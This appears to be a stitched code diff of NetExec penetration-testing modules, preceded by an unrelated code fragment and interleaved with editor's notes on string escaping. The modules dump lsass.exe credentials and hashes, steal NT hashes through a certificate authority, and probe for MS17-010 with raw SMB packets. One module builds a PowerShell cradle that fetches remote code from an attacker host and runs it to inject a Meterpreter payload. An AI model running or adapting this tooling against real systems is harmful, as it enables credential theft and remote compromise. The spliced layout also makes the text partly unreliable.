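    if always_check is False and when_supported_check is True:
        return "When Supported"
    if always_check is False and when_supported_check is False:
        return "Never"
    return "undetermined"

print(classify_channel_binding(False, True))  # -> When Supported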
|
|
|
@ -1,5 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
# Author:
|
# Author:
|
||||||
# Romain Bentz (pixis - @hackanddo)
|
# Romain Bentz (pixis - @hackanddo)
|
||||||
# Website:
|
# Website:
|
||||||
|
@ -27,9 +25,7 @@ class NXCModule:
|
||||||
self.method = None
|
self.method = None
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""METHOD Method to use to dump lsass.exe with lsassy"""
|
||||||
METHOD Method to use to dump lsass.exe with lsassy
|
|
||||||
"""
|
|
||||||
self.method = "comsvcs"
|
self.method = "comsvcs"
|
||||||
if "METHOD" in module_options:
|
if "METHOD" in module_options:
|
||||||
self.method = module_options["METHOD"]
|
self.method = module_options["METHOD"]
|
||||||
|
@ -60,7 +56,7 @@ class NXCModule:
|
||||||
|
|
||||||
dumper = Dumper(session, timeout=10, time_between_commands=7).load(self.method)
|
dumper = Dumper(session, timeout=10, time_between_commands=7).load(self.method)
|
||||||
if dumper is None:
|
if dumper is None:
|
||||||
context.log.fail("Unable to load dump method '{}'".format(self.method))
|
context.log.fail(f"Unable to load dump method '{self.method}'")
|
||||||
return False
|
return False
|
||||||
|
|
||||||
file = dumper.dump()
|
file = dumper.dump()
|
||||||
|
@ -75,13 +71,13 @@ class NXCModule:
|
||||||
credentials, tickets, masterkeys = parsed
|
credentials, tickets, masterkeys = parsed
|
||||||
|
|
||||||
file.close()
|
file.close()
|
||||||
context.log.debug(f"Closed dumper file")
|
context.log.debug("Closed dumper file")
|
||||||
file_path = file.get_file_path()
|
file_path = file.get_file_path()
|
||||||
context.log.debug(f"File path: {file_path}")
|
context.log.debug(f"File path: {file_path}")
|
||||||
try:
|
try:
|
||||||
deleted_file = ImpacketFile.delete(session, file_path)
|
deleted_file = ImpacketFile.delete(session, file_path)
|
||||||
if deleted_file:
|
if deleted_file:
|
||||||
context.log.debug(f"Deleted dumper file")
|
context.log.debug("Deleted dumper file")
|
||||||
else:
|
else:
|
||||||
context.log.fail(f"[OPSEC] No exception, but failed to delete file: {file_path}")
|
context.log.fail(f"[OPSEC] No exception, but failed to delete file: {file_path}")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
|
@ -119,7 +115,7 @@ class NXCModule:
|
||||||
)
|
)
|
||||||
credentials_output.append(cred)
|
credentials_output.append(cred)
|
||||||
|
|
||||||
context.log.debug(f"Calling process_credentials")
|
context.log.debug("Calling process_credentials")
|
||||||
self.process_credentials(context, connection, credentials_output)
|
self.process_credentials(context, connection, credentials_output)
|
||||||
|
|
||||||
def process_credentials(self, context, connection, credentials):
|
def process_credentials(self, context, connection, credentials):
|
||||||
|
@ -128,7 +124,7 @@ class NXCModule:
|
||||||
credz_bh = []
|
credz_bh = []
|
||||||
domain = None
|
domain = None
|
||||||
for cred in credentials:
|
for cred in credentials:
|
||||||
if cred["domain"] == None:
|
if cred["domain"] is None:
|
||||||
cred["domain"] = ""
|
cred["domain"] = ""
|
||||||
domain = cred["domain"]
|
domain = cred["domain"]
|
||||||
if "." not in cred["domain"] and cred["domain"].upper() in connection.domain.upper():
|
if "." not in cred["domain"] and cred["domain"].upper() in connection.domain.upper():
|
||||||
|
@ -157,7 +153,7 @@ class NXCModule:
|
||||||
def print_credentials(context, domain, username, password, lmhash, nthash):
|
def print_credentials(context, domain, username, password, lmhash, nthash):
|
||||||
if password is None:
|
if password is None:
|
||||||
password = ":".join(h for h in [lmhash, nthash] if h is not None)
|
password = ":".join(h for h in [lmhash, nthash] if h is not None)
|
||||||
output = "%s\\%s %s" % (domain, username, password)
|
output = f"{domain}\\{username} {password}"
|
||||||
context.log.highlight(output)
|
context.log.highlight(output)
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from masky import Masky
|
from masky import Masky
|
||||||
from nxc.helpers.bloodhound import add_user_bh
|
from nxc.helpers.bloodhound import add_user_bh
|
||||||
|
|
||||||
|
@ -13,7 +10,7 @@ class NXCModule:
|
||||||
multiple_hosts = True
|
multiple_hosts = True
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
r"""
|
||||||
CA Certificate Authority Name (CA_SERVER\CA_NAME)
|
CA Certificate Authority Name (CA_SERVER\CA_NAME)
|
||||||
TEMPLATE Template name allowing users to authenticate with (default: User)
|
TEMPLATE Template name allowing users to authenticate with (default: User)
|
||||||
DC_IP IP Address of the domain controller
|
DC_IP IP Address of the domain controller
|
||||||
|
@ -40,7 +37,7 @@ class NXCModule:
|
||||||
|
|
||||||
def on_admin_login(self, context, connection):
|
def on_admin_login(self, context, connection):
|
||||||
if not self.ca:
|
if not self.ca:
|
||||||
context.log.fail("Please provide a valid CA server and CA name (CA_SERVER\CA_NAME)")
|
context.log.fail(r"Please provide a valid CA server and CA name (CA_SERVER\CA_NAME)")
|
||||||
return False
|
return False
|
||||||
|
|
||||||
host = connection.host
|
host = connection.host
|
||||||
|
@ -85,7 +82,7 @@ class NXCModule:
|
||||||
pwned_users = 0
|
pwned_users = 0
|
||||||
for user in rslts.users:
|
for user in rslts.users:
|
||||||
if user.nthash:
|
if user.nthash:
|
||||||
context.log.highlight(f"{user.domain}\{user.name} {user.nthash}")
|
context.log.highlight(f"{user.domain}\\{user.name} {user.nthash}")
|
||||||
self.process_credentials(connection, context, user)
|
self.process_credentials(connection, context, user)
|
||||||
pwned_users += 1
|
pwned_users += 1
|
||||||
|
|
||||||
|
@ -115,7 +112,7 @@ class NXCModule:
|
||||||
|
|
||||||
if not tracker.files_cleaning_success:
|
if not tracker.files_cleaning_success:
|
||||||
context.log.fail("Fail to clean files related to Masky")
|
context.log.fail("Fail to clean files related to Masky")
|
||||||
context.log.fail((f"Please remove the files named '{tracker.agent_filename}', '{tracker.error_filename}', " f"'{tracker.output_filename}' & '{tracker.args_filename}' within the folder '\\Windows\\Temp\\'"))
|
context.log.fail(f"Please remove the files named '{tracker.agent_filename}', '{tracker.error_filename}', '{tracker.output_filename}' & '{tracker.args_filename}' within the folder '\\Windows\\Temp\\'")
|
||||||
ret = False
|
ret = False
|
||||||
|
|
||||||
if not tracker.svc_cleaning_success:
|
if not tracker.svc_cleaning_success:
|
||||||
|
|
|
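Editor's note on the masky hunks above: every change is about backslash handling in string literals, since sequences like \C and \{ are not valid Python escapes and trigger warnings on newer interpreters. A small illustration of the two fixes the diff applies, a raw string versus a doubled backslash; the domain, name, and hash values here are made up.

domain, name = "CORP", "alice"

# Raw string: backslashes are kept literally, no escape processing.
help_text = r"CA Certificate Authority Name (CA_SERVER\CA_NAME)"

# Doubled backslash inside an f-string renders a single literal backslash.
line = f"{domain}\\{name} 31d6cfe0d16ae931b73c59d7e0c089c0"

print(help_text)
print(line)  # CORP\alice 31d6cfe0d16ae931b73c59d7e0c089c0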
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from sys import exit
|
from sys import exit
|
||||||
|
|
||||||
|
|
||||||
|
@ -41,7 +38,6 @@ class NXCModule:
|
||||||
Set payload to what you want (windows/meterpreter/reverse_https, etc)
|
Set payload to what you want (windows/meterpreter/reverse_https, etc)
|
||||||
after running, copy the end of the URL printed (e.g. M5LemwmDHV) and set RAND to that
|
after running, copy the end of the URL printed (e.g. M5LemwmDHV) and set RAND to that
|
||||||
"""
|
"""
|
||||||
|
|
||||||
self.met_ssl = "https"
|
self.met_ssl = "https"
|
||||||
|
|
||||||
if "SRVHOST" not in module_options or "SRVPORT" not in module_options:
|
if "SRVHOST" not in module_options or "SRVPORT" not in module_options:
|
||||||
|
@ -60,7 +56,7 @@ class NXCModule:
|
||||||
# stolen from https://github.com/jaredhaight/Invoke-MetasploitPayload
|
# stolen from https://github.com/jaredhaight/Invoke-MetasploitPayload
|
||||||
command = """$url="{}://{}:{}/{}"
|
command = """$url="{}://{}:{}/{}"
|
||||||
$DownloadCradle ='[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};$client = New-Object Net.WebClient;$client.Proxy=[Net.WebRequest]::GetSystemWebProxy();$client.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('''+$url+'''");'
|
$DownloadCradle ='[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};$client = New-Object Net.WebClient;$client.Proxy=[Net.WebRequest]::GetSystemWebProxy();$client.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('''+$url+'''");'
|
||||||
$PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\powershell.exe'
|
$PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'
|
||||||
if([Environment]::Is64BitProcess) {{ $PowershellExe='powershell.exe'}}
|
if([Environment]::Is64BitProcess) {{ $PowershellExe='powershell.exe'}}
|
||||||
$ProcessInfo = New-Object System.Diagnostics.ProcessStartInfo
|
$ProcessInfo = New-Object System.Diagnostics.ProcessStartInfo
|
||||||
$ProcessInfo.FileName=$PowershellExe
|
$ProcessInfo.FileName=$PowershellExe
|
||||||
|
|
|
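Editor's note on the met_inject download cradle above: the template is filled with str.format, so PowerShell script blocks such as {$true} must be written as {{$true}} to survive formatting. A minimal sketch of that escaping; the host, port, and URL suffix are hypothetical values.

template = '$url="{}://{}:{}/{}"; $cb = {{$true}}'
command = template.format("https", "10.0.0.5", 8443, "M5LemwmDHV")
print(command)  # $url="https://10.0.0.5:8443/M5LemwmDHV"; $cb = {$true}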
@ -1,31 +1,14 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
# All credits to https://github.com/d4t4s3c/Win7Blue
|
# All credits to https://github.com/d4t4s3c/Win7Blue
|
||||||
# @d4t4s3c
|
# @d4t4s3c
|
||||||
# Module by @mpgn_x64
|
# Module by @mpgn_x64
|
||||||
|
|
||||||
from ctypes import *
|
from ctypes import c_uint8, c_uint16, c_uint32, c_uint64, Structure
|
||||||
import socket
|
import socket
|
||||||
import struct
|
import struct
|
||||||
|
from nxc.logger import nxc_logger
|
||||||
|
|
||||||
|
|
||||||
class NXCModule:
|
class SmbHeader(Structure):
|
||||||
name = "ms17-010"
|
|
||||||
description = "MS17-010, /!\ not tested oustide home lab"
|
|
||||||
supported_protocols = ["smb"]
|
|
||||||
opsec_safe = True
|
|
||||||
multiple_hosts = True
|
|
||||||
|
|
||||||
def options(self, context, module_options):
|
|
||||||
""" """
|
|
||||||
|
|
||||||
def on_login(self, context, connection):
|
|
||||||
if check(connection.host):
|
|
||||||
context.log.highlight("VULNERABLE")
|
|
||||||
context.log.highlight("Next step: https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/")
|
|
||||||
|
|
||||||
|
|
||||||
class SMB_HEADER(Structure):
|
|
||||||
"""SMB Header decoder."""
|
"""SMB Header decoder."""
|
||||||
|
|
||||||
_pack_ = 1
|
_pack_ = 1
|
||||||
|
@ -47,292 +30,474 @@ class SMB_HEADER(Structure):
|
||||||
("multiplex_id", c_uint16),
|
("multiplex_id", c_uint16),
|
||||||
]
|
]
|
||||||
|
|
||||||
|
def __init__(self, buffer):
|
||||||
|
nxc_logger.debug("server_component : %04x" % self.server_component)
|
||||||
|
nxc_logger.debug("smb_command : %01x" % self.smb_command)
|
||||||
|
nxc_logger.debug("error_class : %01x" % self.error_class)
|
||||||
|
nxc_logger.debug("error_code : %02x" % self.error_code)
|
||||||
|
nxc_logger.debug("flags : %01x" % self.flags)
|
||||||
|
nxc_logger.debug("flags2 : %02x" % self.flags2)
|
||||||
|
nxc_logger.debug("process_id_high : %02x" % self.process_id_high)
|
||||||
|
nxc_logger.debug("signature : %08x" % self.signature)
|
||||||
|
nxc_logger.debug("reserved2 : %02x" % self.reserved2)
|
||||||
|
nxc_logger.debug("tree_id : %02x" % self.tree_id)
|
||||||
|
nxc_logger.debug("process_id : %02x" % self.process_id)
|
||||||
|
nxc_logger.debug("user_id : %02x" % self.user_id)
|
||||||
|
nxc_logger.debug("multiplex_id : %02x" % self.multiplex_id)
|
||||||
|
|
||||||
def __new__(self, buffer=None):
|
def __new__(self, buffer=None):
|
||||||
|
nxc_logger.debug(f"Creating SMB_HEADER object from buffer: {buffer}")
|
||||||
return self.from_buffer_copy(buffer)
|
return self.from_buffer_copy(buffer)
|
||||||
|
|
||||||
|
|
||||||
def generate_smb_proto_payload(*protos):
|
class NXCModule:
|
||||||
"""Generate SMB Protocol. Pakcet protos in order."""
|
name = "ms17-010"
|
||||||
hexdata = []
|
description = "MS17-010 - EternalBlue - NOT TESTED OUTSIDE LAB ENVIRONMENT"
|
||||||
for proto in protos:
|
supported_protocols = ["smb"]
|
||||||
hexdata.extend(proto)
|
opsec_safe = True
|
||||||
return "".join(hexdata)
|
multiple_hosts = True
|
||||||
|
|
||||||
|
def options(self, context, module_options):
|
||||||
|
""" """
|
||||||
|
self.logger = context.log
|
||||||
|
|
||||||
|
def on_login(self, context, connection):
|
||||||
|
try:
|
||||||
|
if self.check(connection.host):
|
||||||
|
context.log.highlight("VULNERABLE")
|
||||||
|
context.log.highlight("Next step: https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/")
|
||||||
|
except ConnectionResetError as e:
|
||||||
|
context.log.debug(f"Error connecting to host when checking for MS17-010: {e!s}")
|
||||||
|
except ValueError as e:
|
||||||
|
if str(e) == "Buffer size too small (0 instead of at least 32 bytes)":
|
||||||
|
context.log.debug("Buffer size too small, which means the response was not the expected size")
|
||||||
|
|
||||||
|
|
||||||
def calculate_doublepulsar_xor_key(s):
|
def generate_smb_proto_payload(self, *protos):
|
||||||
"""Calaculate Doublepulsar Xor Key"""
|
"""
|
||||||
x = 2 * s ^ (((s & 0xFF00 | (s << 16)) << 8) | (((s >> 16) | s & 0xFF0000) >> 8))
|
Flattens a nested list and merges all bytes objects into a single bytes object.
|
||||||
x = x & 0xFFFFFFFF
|
|
||||||
return x
|
Args:
|
||||||
|
----
|
||||||
|
*protos (list): The list to flatten and merge.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
bytes: The merged bytes object.
|
||||||
|
"""
|
||||||
|
self.logger.debug("generate smb proto payload")
|
||||||
|
self.logger.debug(f"Protos: {protos}")
|
||||||
|
|
||||||
|
hex_data = b""
|
||||||
|
for proto in protos:
|
||||||
|
if isinstance(proto, list):
|
||||||
|
hex_data += self.generate_smb_proto_payload(*proto)
|
||||||
|
elif isinstance(proto, bytes):
|
||||||
|
hex_data += proto
|
||||||
|
|
||||||
|
self.logger.debug(f"Packed proto data: {hex_data}")
|
||||||
|
return hex_data
|
||||||
|
|
||||||
|
|
||||||
def negotiate_proto_request():
|
def calculate_doublepulsar_xor_key(self, s):
|
||||||
"""Generate a negotiate_proto_request packet."""
|
"""
|
||||||
netbios = ["\x00", "\x00\x00\x54"]
|
Calculate Doublepulsar Xor Key.
|
||||||
|
|
||||||
smb_header = [
|
Args:
|
||||||
"\xFF\x53\x4D\x42",
|
----
|
||||||
"\x72",
|
s (int): The input value.
|
||||||
"\x00\x00\x00\x00",
|
|
||||||
"\x18",
|
|
||||||
"\x01\x28",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x00\x00\x00\x00\x00\x00\x00\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x2F\x4B",
|
|
||||||
"\x00\x00",
|
|
||||||
"\xC5\x5E",
|
|
||||||
]
|
|
||||||
|
|
||||||
negotiate_proto_request = [
|
Returns:
|
||||||
"\x00",
|
-------
|
||||||
"\x31\x00",
|
int: The calculated xor key.
|
||||||
"\x02",
|
"""
|
||||||
"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00",
|
nxc_logger.debug(f"Calculating Doublepulsar XOR key for: {s}")
|
||||||
"\x02",
|
x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))
|
||||||
"\x4C\x4D\x31\x2E\x32\x58\x30\x30\x32\x00",
|
return x & 0xffffffff # truncate to 32 bits
|
||||||
"\x02",
|
|
||||||
"\x4E\x54\x20\x4C\x41\x4E\x4D\x41\x4E\x20\x31\x2E\x30\x00",
|
|
||||||
"\x02",
|
|
||||||
"\x4E\x54\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00",
|
|
||||||
]
|
|
||||||
|
|
||||||
return generate_smb_proto_payload(netbios, smb_header, negotiate_proto_request)
|
|
||||||
|
|
||||||
|
|
||||||
def session_setup_andx_request():
|
|
||||||
"""Generate session setuo andx request."""
|
|
||||||
netbios = ["\x00", "\x00\x00\x63"]
|
|
||||||
|
|
||||||
smb_header = [
|
def negotiate_proto_request(self):
|
||||||
"\xFF\x53\x4D\x42",
|
"""Generate a negotiate_proto_request packet."""
|
||||||
"\x73",
|
self.logger.debug("generate negotiate proto request")
|
||||||
"\x00\x00\x00\x00",
|
|
||||||
"\x18",
|
|
||||||
"\x01\x20",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x00\x00\x00\x00\x00\x00\x00\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x2F\x4B",
|
|
||||||
"\x00\x00",
|
|
||||||
"\xC5\x5E",
|
|
||||||
]
|
|
||||||
|
|
||||||
session_setup_andx_request = [
|
# Define the NetBIOS header
|
||||||
"\x0D",
|
netbios = [
|
||||||
"\xFF",
|
b"\x00", # Message Type
|
||||||
"\x00",
|
b"\x00\x00\x54", # Length
|
||||||
"\x00\x00",
|
]
|
||||||
"\xDF\xFF",
|
|
||||||
"\x02\x00",
|
|
||||||
"\x01\x00",
|
|
||||||
"\x00\x00\x00\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x00\x00\x00\x00",
|
|
||||||
"\x40\x00\x00\x00",
|
|
||||||
"\x26\x00",
|
|
||||||
"\x00",
|
|
||||||
"\x2e\x00",
|
|
||||||
"\x57\x69\x6e\x64\x6f\x77\x73\x20\x32\x30\x30\x30\x20\x32\x31\x39\x35\x00",
|
|
||||||
"\x57\x69\x6e\x64\x6f\x77\x73\x20\x32\x30\x30\x30\x20\x35\x2e\x30\x00",
|
|
||||||
]
|
|
||||||
|
|
||||||
return generate_smb_proto_payload(netbios, smb_header, session_setup_andx_request)
|
# Define the SMB header
|
||||||
|
smb_header = [
|
||||||
|
b"\xFF\x53\x4D\x42", # Server Component
|
||||||
|
b"\x72", # SMB Command
|
||||||
|
b"\x00\x00\x00\x00", # NT Status
|
||||||
|
b"\x18", # Flags
|
||||||
|
b"\x01\x28", # Flags2
|
||||||
|
b"\x00\x00", # Process ID High
|
||||||
|
b"\x00\x00\x00\x00\x00\x00\x00\x00", # Signature
|
||||||
|
b"\x00\x00", # Reserved
|
||||||
|
b"\x00\x00", # Tree ID
|
||||||
|
b"\x2F\x4B", # Process ID
|
||||||
|
b"\x00\x00", # User ID
|
||||||
|
b"\xC5\x5E", # Multiplex ID
|
||||||
|
]
|
||||||
|
|
||||||
|
# Define the negotiate_proto_request
|
||||||
|
negotiate_proto_request = [
|
||||||
|
b"\x00", # Word Count
|
||||||
|
b"\x31\x00", # Byte Count
|
||||||
|
b"\x02", # Requested Dialects Count
|
||||||
|
b"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00", # Requested Dialects: LANMAN1.0
|
||||||
|
b"\x02", # Requested Dialects Count
|
||||||
|
b"\x4C\x4D\x31\x2E\x32\x58\x30\x30\x32\x00", # Requested Dialects: LM1.2X002
|
||||||
|
b"\x02", # Requested Dialects Count
|
||||||
|
b"\x4E\x54\x20\x4C\x41\x4E\x4D\x41\x4E\x20\x31\x2E\x30\x00", # Requested Dialects: NT LANMAN 1.0
|
||||||
|
b"\x02", # Requested Dialects Count
|
||||||
|
b"\x4E\x54\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00", # Requested Dialects: NT LM 0.12
|
||||||
|
]
|
||||||
|
|
||||||
|
# Return the generated SMB protocol payload
|
||||||
|
return self.generate_smb_proto_payload(netbios, smb_header, negotiate_proto_request)
|
||||||
|
|
||||||
|
|
||||||
def tree_connect_andx_request(ip, userid):
|
def session_setup_andx_request(self):
|
||||||
"""Generate tree connect andx request."""
|
"""Generate session setup andx request."""
|
||||||
|
self.logger.debug("generate session setup andx request"
|
||||||
|
)
|
||||||
|
# Define the NetBIOS bytes
|
||||||
|
netbios = [
|
||||||
|
b"\x00", # length
|
||||||
|
b"\x00\x00\x63", # session service
|
||||||
|
]
|
||||||
|
|
||||||
netbios = ["\x00", "\x00\x00\x47"]
|
# Define the SMB header bytes
|
||||||
|
smb_header = [
|
||||||
|
b"\xFF\x53\x4D\x42", # server component: .SMB
|
||||||
|
b"\x73", # command: Session Setup AndX
|
||||||
|
b"\x00\x00\x00\x00", # NT status
|
||||||
|
b"\x18", # flags
|
||||||
|
b"\x01\x20", # flags2
|
||||||
|
b"\x00\x00", # PID high
|
||||||
|
b"\x00\x00\x00\x00\x00\x00\x00\x00", # signature
|
||||||
|
b"\x00\x00", # reserved
|
||||||
|
b"\x00\x00", # tree id
|
||||||
|
b"\x2F\x4B", # pid
|
||||||
|
b"\x00\x00", # uid
|
||||||
|
b"\xC5\x5E", # multiplex id
|
||||||
|
]
|
||||||
|
|
||||||
smb_header = [
|
# Define the session setup andx request bytes
|
||||||
"\xFF\x53\x4D\x42",
|
session_setup_andx_request = [
|
||||||
"\x75",
|
b"\x0D", # word count
|
||||||
"\x00\x00\x00\x00",
|
b"\xFF", # andx command: no further commands
|
||||||
"\x18",
|
b"\x00", # reserved
|
||||||
"\x01\x20",
|
b"\x00\x00", # andx offset
|
||||||
"\x00\x00",
|
b"\xDF\xFF", # max buffer
|
||||||
"\x00\x00\x00\x00\x00\x00\x00\x00",
|
b"\x02\x00", # max mpx count
|
||||||
"\x00\x00",
|
b"\x01\x00", # VC number
|
||||||
"\x00\x00",
|
b"\x00\x00\x00\x00", # session key
|
||||||
"\x2F\x4B",
|
b"\x00\x00", # ANSI password length
|
||||||
userid,
|
b"\x00\x00", # Unicode password length
|
||||||
"\xC5\x5E",
|
b"\x00\x00\x00\x00", # reserved
|
||||||
]
|
b"\x40\x00\x00\x00", # capabilities
|
||||||
|
b"\x26\x00", # byte count
|
||||||
|
b"\x00", # account
|
||||||
|
b"\x2e\x00", # primary domain
|
||||||
|
b"\x57\x69\x6e\x64\x6f\x77\x73\x20\x32\x30\x30\x30\x20\x32\x31\x39\x35\x00", # Native OS: Windows 2000 2195
|
||||||
|
b"\x57\x69\x6e\x64\x6f\x77\x73\x20\x32\x30\x30\x30\x20\x35\x2e\x30\x00", # Native OS: Windows 2000 5.0
|
||||||
|
]
|
||||||
|
|
||||||
ipc = "\\\\{}\IPC$\x00".format(ip)
|
return self.generate_smb_proto_payload(netbios, smb_header, session_setup_andx_request)
|
||||||
|
|
||||||
tree_connect_andx_request = [
|
|
||||||
"\x04",
|
|
||||||
"\xFF",
|
|
||||||
"\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x01\x00",
|
|
||||||
"\x1A\x00",
|
|
||||||
"\x00",
|
|
||||||
ipc.encode(),
|
|
||||||
"\x3f\x3f\x3f\x3f\x3f\x00",
|
|
||||||
]
|
|
||||||
|
|
||||||
length = len("".join(smb_header)) + len("".join(tree_connect_andx_request))
|
|
||||||
|
|
||||||
netbios[1] = struct.pack(">L", length)[-3:]
|
|
||||||
|
|
||||||
return generate_smb_proto_payload(netbios, smb_header, tree_connect_andx_request)
|
|
||||||
|
|
||||||
|
|
||||||
def peeknamedpipe_request(treeid, processid, userid, multiplex_id):
|
def tree_connect_andx_request(self, ip, userid):
|
||||||
"""Generate tran2 request"""
|
"""Generate tree connect andx request.
|
||||||
|
|
||||||
netbios = ["\x00", "\x00\x00\x4a"]
|
Args:
|
||||||
|
----
|
||||||
|
ip (str): The IP address.
|
||||||
|
userid (str): The user ID.
|
||||||
|
|
||||||
smb_header = [
|
Returns:
|
||||||
"\xFF\x53\x4D\x42",
|
-------
|
||||||
"\x25",
|
bytes: The generated tree connect andx request payload.
|
||||||
"\x00\x00\x00\x00",
|
"""
|
||||||
"\x18",
|
self.logger.debug("generate tree connect andx request")
|
||||||
"\x01\x28",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x00\x00\x00\x00\x00\x00\x00\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
treeid,
|
|
||||||
processid,
|
|
||||||
userid,
|
|
||||||
multiplex_id,
|
|
||||||
]
|
|
||||||
|
|
||||||
tran_request = [
|
# Initialize the netbios header
|
||||||
"\x10",
|
netbios = [
|
||||||
"\x00\x00",
|
b"\x00", # 'Message_Type'
|
||||||
"\x00\x00",
|
b"\x00\x00\x47" # 'Length'
|
||||||
"\xff\xff",
|
]
|
||||||
"\xff\xff",
|
|
||||||
"\x00",
|
|
||||||
"\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x00\x00\x00\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x4a\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x4a\x00",
|
|
||||||
"\x02",
|
|
||||||
"\x00",
|
|
||||||
"\x23\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x07\x00",
|
|
||||||
"\x5c\x50\x49\x50\x45\x5c\x00",
|
|
||||||
]
|
|
||||||
|
|
||||||
return generate_smb_proto_payload(netbios, smb_header, tran_request)
|
# Initialize the SMB header
|
||||||
|
smb_header = [
|
||||||
|
b"\xFF\x53\x4D\x42", # server_compnent: .SMB
|
||||||
|
b"\x75", # smb_command: Tree Connect AndX
|
||||||
|
b"\x00\x00\x00\x00", # 'nt_status'
|
||||||
|
b"\x18", # 'flags'
|
||||||
|
b"\x01\x20", # 'flags2'
|
||||||
|
b"\x00\x00", # 'process_id_high'
|
||||||
|
b"\x00\x00\x00\x00\x00\x00\x00\x00", # 'signature'
|
||||||
|
b"\x00\x00", # 'reserved'
|
||||||
|
b"\x00\x00", # 'tree_id'
|
||||||
|
b"\x2F\x4B", # 'process_id'
|
||||||
|
userid, # 'user_id'
|
||||||
|
b"\xC5\x5E", # 'multiplex_id'
|
||||||
|
]
|
||||||
|
|
||||||
|
# Create the IPC string
|
||||||
|
ipc = f"\\\\{ip}\\IPC$\x00"
|
||||||
|
self.logger.debug(f"Connecting to {ip} with UID: {userid.hex()}")
|
||||||
|
|
||||||
|
# Initialize the tree connect andx request
|
||||||
|
tree_connect_andx_request = [
|
||||||
|
b"\x04", # Word Count
|
||||||
|
b"\xFF", # AndXCommand: No further commands
|
||||||
|
b"\x00", # Reserved
|
||||||
|
b"\x00\x00", # AndXOffset
|
||||||
|
b"\x00\x00", # Flags
|
||||||
|
b"\x01\x00", # Password Length
|
||||||
|
b"\x1A\x00", # Byte Count
|
||||||
|
b"\x00", # Password
|
||||||
|
ipc.encode(), # \\xxx.xxx.xxx.xxx\IPC$
|
||||||
|
b"\x3f\x3f\x3f\x3f\x3f\x00", # Service
|
||||||
|
]
|
||||||
|
|
||||||
|
# Calculate the length of the payload
|
||||||
|
length = len(b"".join(smb_header)) + len(b"".join(tree_connect_andx_request))
|
||||||
|
self.logger.debug(f"Length of payload: {length}")
|
||||||
|
|
||||||
|
# Update the length in the netbios header
|
||||||
|
netbios[1] = struct.pack(">L", length)[-3:]
|
||||||
|
|
||||||
|
self.logger.debug(f"Netbios: {netbios}")
|
||||||
|
self.logger.debug(f"SMB Header: {smb_header}")
|
||||||
|
self.logger.debug(f"Tree Connect AndX Request: {tree_connect_andx_request}")
|
||||||
|
|
||||||
|
# Generate the final SMB protocol payload
|
||||||
|
return self.generate_smb_proto_payload(netbios, smb_header, tree_connect_andx_request)
|
||||||
|
|
||||||
|
|
||||||
def trans2_request(treeid, processid, userid, multiplex_id):
|
def peeknamedpipe_request(self, treeid, processid, userid, multiplex_id):
|
||||||
"""Generate trans2 request."""
|
"""
|
||||||
|
Generate tran2 request.
|
||||||
|
|
||||||
netbios = ["\x00", "\x00\x00\x4f"]
|
Args:
|
||||||
|
----
|
||||||
|
treeid (str): The tree ID.
|
||||||
|
processid (str): The process ID.
|
||||||
|
userid (str): The user ID.
|
||||||
|
multiplex_id (str): The multiplex ID.
|
||||||
|
|
||||||
smb_header = [
|
Returns:
|
||||||
"\xFF\x53\x4D\x42",
|
-------
|
||||||
"\x32",
|
str: The generated SMB protocol payload.
|
||||||
"\x00\x00\x00\x00",
|
"""
|
||||||
"\x18",
|
self.logger.debug("generate peeknamedpipe request")
|
||||||
"\x07\xc0",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x00\x00\x00\x00\x00\x00\x00\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
treeid,
|
|
||||||
processid,
|
|
||||||
userid,
|
|
||||||
multiplex_id,
|
|
||||||
]
|
|
||||||
|
|
||||||
trans2_request = [
|
# Set the necessary values for the netbios header
|
||||||
"\x0f",
|
netbios = [
|
||||||
"\x0c\x00",
|
b"\x00", # message type
|
||||||
"\x00\x00",
|
b"\x00\x00\x4a" # length
|
||||||
"\x01\x00",
|
]
|
||||||
"\x00\x00",
|
|
||||||
"\x00",
|
|
||||||
"\x00",
|
|
||||||
"\x00\x00",
|
|
